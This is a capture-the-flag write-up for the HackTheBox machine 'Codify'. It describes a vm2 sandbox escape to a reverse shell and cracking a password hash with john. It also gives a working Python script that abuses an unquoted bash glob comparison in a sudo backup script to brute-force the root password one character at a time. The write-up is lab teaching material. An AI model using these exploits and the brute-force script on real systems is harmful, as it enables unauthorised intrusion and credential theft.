CODIFY HTB
NMAP SCAN
Add codify.htb to /etc/hosts so the hostname resolves to the target IP.
Visiting the URL shows that the target is a web-based Node.js code editor.
The page states that it runs vm2 version 3.9.16, which is vulnerable to a sandbox escape leading to remote code execution: CVE-2023-30547 (fixed in vm2 3.9.17).
A quick Google search turns up the public proof of concept.
Replacing the command passed to execSync() with a reverse shell, and starting a netcat listener beforehand, gives a shell on the box.
PRIVILEGE ESCALATION
Reading files in joshua's home directory is denied, so the user flag needs another route.
There is a database file in /var/www/contact that contains joshua's password hash.
Saving the hash to a file, it cracks with john against rockyou:
john --wordlist=/usr/share/wordlists/rockyou.txt hash
With the cracked password we can SSH in as joshua, read the user flag, and continue.
Running sudo -l
shows that joshua can run /opt/scripts/mysql-backup.sh as root.
The script asks for the MySQL root password before it does anything, but the check can be bypassed: a guessed first character followed by * is accepted. That is exactly the behaviour of bash's [[ ... == ... ]] test with an unquoted right-hand operand, where the operand is treated as a glob pattern, so a* matches any password beginning with a. Since the script prints "Password confirmed!" on a match, the password can be recovered one character at a time: for each position, try every candidate character followed by *, keep the one that is confirmed, and stop when no character extends the prefix any further. (Quoting both sides of the comparison would have closed this hole.) The character set below is letters and digits; a password containing any other character would stop the loop early.
import string
import subprocess

# Candidate characters for each position of the password.
charset = list(string.ascii_letters + string.digits)
password = ""
found = False

while not found:
    for character in charset:
        # Feed "<known prefix><candidate>*" to the script's password prompt;
        # the unquoted comparison treats the trailing * as a glob wildcard.
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
        if "Password confirmed!" in output:
            password += character
            print(password)
            break
    else:
        # No character extends the prefix, so the full password has been recovered.
        found = True
This recovers the password the script checks, and the same password works for su to root.
The root flag can then be read.
Thanks.